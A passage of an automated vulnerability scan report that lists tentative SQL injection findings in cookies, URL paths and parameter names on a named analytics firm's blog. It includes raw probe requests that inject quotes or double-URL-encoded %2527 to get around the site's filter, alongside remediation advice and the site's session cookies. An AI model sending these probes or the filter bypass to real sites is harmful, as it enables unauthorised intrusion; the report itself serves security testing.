Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0%2527%2527; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 05:46:07 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 05:46:11 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 05:46:11 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 37533


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.122. http://www.analyticspros.com/blog/googleanalytics/93-dimensionator-google-analytics-dimensions.html [optimizelyEndUserId cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/93-dimensionator-google-analytics-dimensions.html

Issue detail

The optimizelyEndUserId cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the optimizelyEndUserId cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the optimizelyEndUserId cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/googleanalytics/93-dimensionator-google-analytics-dimensions.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169%2527;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 05:52:17 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/googleanalytics/93-dimensionator-google-analytics-dimensions.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169%2527%2527;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 05:52:26 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 05:52:27 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 05:52:27 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 37532


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.123. http://www.analyticspros.com/blog/googleanalytics/95-more-dimensions-site-search-source-medium.html [__utma cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/95-more-dimensions-site-search-source-medium.html

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utma cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/googleanalytics/95-more-dimensions-site-search-source-medium.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=10
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1'; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Fri, 05 Nov 2010 23:47:36 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/googleanalytics/95-more-dimensions-site-search-source-medium.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=10
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1''; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Fri, 05 Nov 2010 23:47:43 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Wed, 26-Oct-2011 23:47:56 GMT; path=/
Last-Modified: Fri, 05 Nov 2010 23:47:56 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22847


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.124. http://www.analyticspros.com/blog/googleanalytics/95-more-dimensions-site-search-source-medium.html [__utmmobile cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/95-more-dimensions-site-search-source-medium.html

Issue detail

The __utmmobile cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmmobile cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the __utmmobile cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/googleanalytics/95-more-dimensions-site-search-source-medium.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=10
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c%2527; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:09:20 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/googleanalytics/95-more-dimensions-site-search-source-medium.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=10
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c%2527%2527; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:09:20 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:09:23 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 06:09:23 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22847


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.125. http://www.analyticspros.com/blog/googleanalytics/95-more-dimensions-site-search-source-medium.html [__utmmobile cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/95-more-dimensions-site-search-source-medium.html

Issue detail

The __utmmobile cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmmobile cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/googleanalytics/95-more-dimensions-site-search-source-medium.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=10
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c'; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Fri, 05 Nov 2010 23:56:35 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/googleanalytics/95-more-dimensions-site-search-source-medium.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=10
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c''; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Fri, 05 Nov 2010 23:56:36 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Wed, 26-Oct-2011 23:57:01 GMT; path=/
Last-Modified: Fri, 05 Nov 2010 23:57:01 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22847


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.126. http://www.analyticspros.com/blog/googleanalytics/95-more-dimensions-site-search-source-medium.html [ki_t cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/95-more-dimensions-site-search-source-medium.html

Issue detail

The ki_t cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ki_t cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/googleanalytics/95-more-dimensions-site-search-source-medium.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=10
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11'; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:04:01 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/googleanalytics/95-more-dimensions-site-search-source-medium.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=10
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11''; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:04:04 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:04:07 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 06:04:07 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22846


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.127. http://www.analyticspros.com/blog/googleanalytics/95-more-dimensions-site-search-source-medium.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/95-more-dimensions-site-search-source-medium.html

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/googleanalytics/95-more-dimensions-site-search-source-medium.html?1'=1 HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=10
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:15:28 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/googleanalytics/95-more-dimensions-site-search-source-medium.html?1''=1 HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=10
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:15:29 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:15:30 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 06:15:30 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22865


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.128. http://www.analyticspros.com/blog/googleanalytics/97-workshop-january-29th-dimensionator.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/97-workshop-january-29th-dimensionator.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog'/googleanalytics/97-workshop-january-29th-dimensionator.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/googleanalytics.html?type=atom&start=10
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 404 Component not found
Date: Sat, 06 Nov 2010 06:24:14 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Sat, 06 Nov 2010 06:24:17 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 3015

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir="
...[SNIP]...
<title>404 - Error: 404</title>
...[SNIP]...

Request 2

GET /blog''/googleanalytics/97-workshop-january-29th-dimensionator.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/googleanalytics.html?type=atom&start=10
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:24:17 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 326
Connection: close
Content-Type: text/html

<br />
